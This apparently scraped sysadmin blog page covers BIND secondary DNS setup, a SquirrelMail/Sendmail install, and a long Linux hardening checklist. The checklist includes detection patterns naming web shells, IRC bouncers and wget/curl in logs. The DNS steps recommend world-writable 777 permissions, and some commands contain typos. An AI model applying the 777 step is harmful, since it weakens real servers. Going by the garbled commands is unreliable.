};

zone "localhost" IN {
type master;
file "localhost.zone";
allow-update { none; };
};

zone "yourdomain.com" IN {
type slave;
file "/var/named/yourdomain.com.zone";
// allow-update { none; };
allow-transfer { 192.168.0.1/32; };
masters { 192.168.0.1; };
};

zone "0.168.192.in-addr.arpa" IN {
type slave;
file "/var/named/0.168.192.rev";
// allow-update { none; };
allow-transfer { 192.168.0.1/32; };
masters { 192.168.0.1; };
};

include "/etc/rndc.key";

4. Change permission of the directory /var/named

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.zero’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/localhost.zone’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/data’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.local’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.ca’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.ip6.local’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/localdomain.zone’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.broadcast’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/slaves’ changed to 0777 (rwxrwxrwx)

5. The files /var/named/yourdomain.com and /var/named/0.168.192.rev will automatically be copied to NS2.

6. Running service named

[root@server ~]# service named restart

Stopping named: [ OK ]

Starting named: [ OK ]

7. And check in log file what’s the matter???

[root@server ~]# tail /var/log/messages

Aug 3 04:25:42 server named[9362]: listening on IPv4 interface venet0:0, 192.168.0.2#53
Aug 3 04:25:42 server named[9362]: command channel listening on 127.0.0.1#953
Aug 3 04:25:42 server named[9362]: zone localhost/IN: loaded serial 42
Aug 3 04:25:42 server named[9362]: running
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: transferred serial 100
Aug 3 04:25:42 server named[9362]: transfer of ‘yourdomain.com/IN’ from 192.168.0.1#53: end of transfer
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: sending notifies (serial 100)
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: transferred serial 100
Aug 3 04:25:43 server named[9362]: transfer of ‘0.168.192.in-addr.arpa/IN’ from 192.168.0.1#53: end of transfer
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: sending notifies (serial 100)

Looking at this log, you can see that the yourdomain.com zone gets transferred. Actually this file is copied to NS2 so, if NS1 is dead or has a problem, NS2 has a backup configuration.

8. Result using nslookup

[root@server ~]# nslookup yourdomain.com

Server: 192.168.0.1

Address: 192.168.0.1#53

Name: yourdomain.com

Address: 192.168.0.1

answered from nslookup used server from NS1 with IP 192.168.0.1

Now we can try to deactivate NS1 to see if name resolution is still working.

9. First adding nameserver 192.168.0.2

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

nameserver 192.168.0.2

This domain is using NS2 because NS1 is not active. We don’t need to change any files on NS2 because all zone files are transferred from NS1 to NS2.

10. Trying a DNS lookup while NS1 is down

[root@server ~]# nslookup yourdomain.com

Server: 192.168.0.2

Address: 192.168.0.2#53

Name: yourdomain.com

Address: 192.168.0.1

Now if there’s any problem with NS1 you can rest calm because NS2 acts as a backup.

Document Source: http://www.howtoforge.com/installation-of-bind-as-a-secondary-slave-dns-server-on-centos

SquirrelMail Configuration Easy Steps (SquirrelMail + Sendmail + Apache On RedHat/CentOS/Fedora)

Posted: July 28, 2010 in LINUX, Linux Server, SENDMAIL, SMTP
0

This tutorial explains how you can install and configure SquirrelMail on a RedHat/CentOS/Fedora based mail server which uses Sendmail and Apache.

Scenario:

Primary Mail Server: linuxbox4 (192.168.0.14)
Domain Name: abc.com
Trusted IP Pool: 192.168.0.0/24

Note: Replace domain name and system name and IP according to your scenario.

Prerequisites:

1.  DNS is configured with proper MX record.
2.  All necessary packages/ softwares are installed.

Step 1:

Configure all service to start at boot time.

chkconfig sendmail on
chkconfig httpd  on
chkconfig dovecot on

Step 2:

Configure /etc/hosts file. In this scenario /etc/hosts file should look like this:

192.168.0.14    linuxbox4   www.abc.com 


Step 3:
 
Outgoing Mail Server Configuration (Sendmail):
 
Open /etc/mail/sendmail.mc file and change the following two lines.
 
From:


DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
FEATURE(`accept_unresolvable_domains')dnl 


To: 


dnl DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
dnl FEATURE(`accept_unresolvable_domains')dnl 


Save and exit.
 
- First line here enables sendmail to receive incoming emails on all  installed the NICs. Otherwise mail server would only be able to receive  mails from it.

- Second line here tells sendmail, do not receive emails from mail  servers whose PTR record is not configured in DNS server. This is a  basic level SPAM control settings in sendmail.
 
Generate sendmail.cf file from sendmail.mc file.
 
m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
 
 


Step 4:


Allow RELAY for trusts (organization's) IP addresses that you want to permit sending emails using this mail server. Open /etc/mail/access  in this file we specify all those addresses that will be sending emails  through this mail server. At the end of this file add the following  line:


192.168.0 RELAY 


Save and exit and convert this text database into DB format by following command.
 
makemap hash access.db < access
 
 


Step 5:


Tell sendmail that it will be acting as a primary mail server for "abc.com" domain. We do this by adding domain name in /etc/mail/local-host-names.  If this server is acting as a mail server for more then one domains  then add names of all of the domains in this file on separate line. Open  /etc/mail/local-host-names and add "abc.com" at the end of this file.
 
Note: A mail server can act as a primary mail server for more then  one domains at the same time and as well as can act as a primary and  secondary mail server for more than one domain at the same time.
 
 


Step 6:


All system users are mail users as well. Now create mail only users.
 
useradd -s /usr/sbin/smrsh mailuser1 
 useradd -s /usr/s2n/smrsh mailuser1
 
Also set their passwords:
 
passwd mailuser1 
 passwd mailuser2
 
 


Step 7:


Finally restart sendmail service.
 
service sendmail restart


Step 8:


Incoming Mail Server Configuration (Dovecot):
 
Open /etc/dovecot.conf and change the following lines.
 
From:


#protocols = imap  pop3

To:

protocols = imap imaps pop3 pop3s  


Save and exit and restart dovecot service.
 
service dovecot restart
 
 
 
 


Step 9:


Webserver Configuration (Apache):
 
Apache  comes  pre-configured, you  just  have  to  change the  ServerName parameter  in /etc/httpd/conf/httpd.conf  file and restart the service, that’s all. Open /etc/httpd/conf/httpd.conf  and set the ServerName parameter.


ServerName www.abc.com 


Save and exit and restart httpd service.
 
service httpd restart
 
 


Installation & Configuration of Squirrelmail  


•  Check that Squirrelmail is installed on the system.
 
# rpm –q squirrelmail
 
•  If squirrelmail is not installed on the system then install it through rpm:
 
# rpm –ivh squirrelmail
 
•  Now go to the squirrelmail directory, located in /usr/share.
 
# cd /usr/share/squirrelmail
 
•  Then go to the config directory:
 
# cd config
 
•  Now run one of the following commands to configure squirrelmail.
 
# ./conf.pl
 
OR
 
perl conf.pl
 
•  Now select option 1 (Organization Preferences).
 
Organization Name  :  YOUR_ORG_NAME 
 Organization Title  :  YOUR_ORG_NAME Webmail  
 Provider link    :  http://YOUR_ORG_SITE_ADDRESS 
 Provider name  :  YOUR_ORG_NAME
 
•  Now select option 2 (Server Settings). 
 
Domain                   :  abc.com 
Sendmail or SMTP :  Sendmail 
IMAP Server          :  localhost 
IMAP Port               :  143 
Server software     :  uw 
Delimiter                :  /
 
•  Now select option 3 (Folder Settings).
 
Default Folder Prefix                : mail/ 
Show Folder Prefix Option       : true
 
Trash Folder                            : Trash 
Sent Folder                              : Sent 
Drafts Folder                           : Drafts 
By default, move to trash        : true 
By default, move to sent         : true 
By default, save as draft          : true 
List Special Folders First         : true 
Show Special Folders Color    : true 
Auto Expunge                          : true 
Default Sub. of INBOX            : false 
Show 'Contain Sub.' Option    : true 
Default Unseen Notify             : 2 
Default Unseen Type              : 1 
Auto Create Special Folders   : true 
Folder Delete Bypasses Trash  : false 
Enable /NoSelect folder fix   : false

•  Now select option 4 (General Settings).
 
Data Directory                       : /var/lib/squirrelmail/prefs/ 
Attachment Directory            : /var/spool/squirrelmail/attach/ 
Directory Hash Level            : 0 
Default Left Size                   : 150 
Usernames in Lowercase     : false 
Allow use of priority              : true 
Hide SM attributions             : false 
Allow use of receipts            : true 
Allow editing of identity        : true 
Allow editing of name          : true 
Remove username from header : false 
Allow server thread sort       : true 
Allow server-side sorting     : true 
Allow server charset search : true 
Enable UID support             : true 
 PHP session name              : SQMSESSID 
Location base                       :
 
•  Now choose option 8 (Plugins) and select the plugins that you wish to provide to your webmail users.
 
•  Now open the browser with the following link: 

http://YOUR_SITE_ADDRESS/webmail

OR

http://192.168.0.14/webmail

How to Secure a Linux Server.

Posted: May 25, 2009 in LINUX, Linux Server, SYSTEM UTILITY
0

How to Secure a Linux Server.

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

   Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104

To modify LogWatch, SSH into server and login as root. At command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account incase you get hacked.

Now scroll down to

Detail = Low

Change that to Medium, or High…

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd

9. Rootkit Hunter

rkhunter:

1. Login to your server via SSH as root. Then Type: cd /usr/local/src/

2. Download RKHunter Version 1.1.4

Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

3. Extract files

Type: tar -xzvf rkhunter-1.1.4.tar.gz

4. Type: cd rkhunter

5. Type: ./installer.sh

6. Lets setup RKHunter to e-mail you you daily scan reports.

Type: pico -w /etc/cron.daily/rkhunter.sh

Add The Following:

1.  !/bin/bash

(/usr/local/bin/rkhunter -c –cronjob 2>&1 | mail -s “RKhunter Scan Details” replace-this@with-your-email.com)

Replace the e-mail above with your e-mail!!

It is best to send the e-mail to an e-mail off-site so that

if the box IS compromised the hacker can’t erase the scan report unless he hacks another server too.

Type: chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

   [root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

51. Check php for register_globals register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

   #!/bin/bash
   #uptime alerti script ..
   UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
   if test $UP -gt 4
   then
   `uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
   fi

89. ignore ping :

1.  iptables -A INPUT -p icmp -j DROP

echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all

vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

              find . -type d -perm 777

91.Check for open ports using nmap command.

92. Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type: /etc/rc.d/init.d/httpd restart

93.Change ssh ListenAddress /etc/ssh/sshd_config

94.PermitRootLogin no

95.Add root login alert

vi .bash_profile

   echo 'ALERT - Root Shell Access on:' `date` `who`
   | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96.Set an SSH Legal Message in /etc/motd

97.Locate.

   locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts

98.Perform some udp and tcp scan here :

http://www.hackerwatch.org/probe/

This site is not bad too : https://grc.com/x/ne.dll?bh0bkyd2

99.Check /var/log/secure , /var/log/messages and other log files of services running to see if there are any issues.

100.Check your box to see if your performance has degraded or if your machine is being over used.

For that, use the commands

vmstat

    Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

    Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

    This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

    Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

    Displays the status of all known processes.

lsof

101. List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

    chmod -R 700 /etc/rc.d/init.d/*
    Use rpm -Va to find out if an rpm is modified
    * Apply security patches to vulnerable software (ie. patch -p1 < patch file)
    * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
    * Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)

102. Install AIDE (Advanced Intrusion Detection Environment) is a free

replacement for Tripwire. = http://www.cs.tut.fi/~rammer/aide.html

103. Testing phase when in production.

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.

        

find /usr/local/apache/domlogs -exec egrep -iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20′ {} \;

Older Entries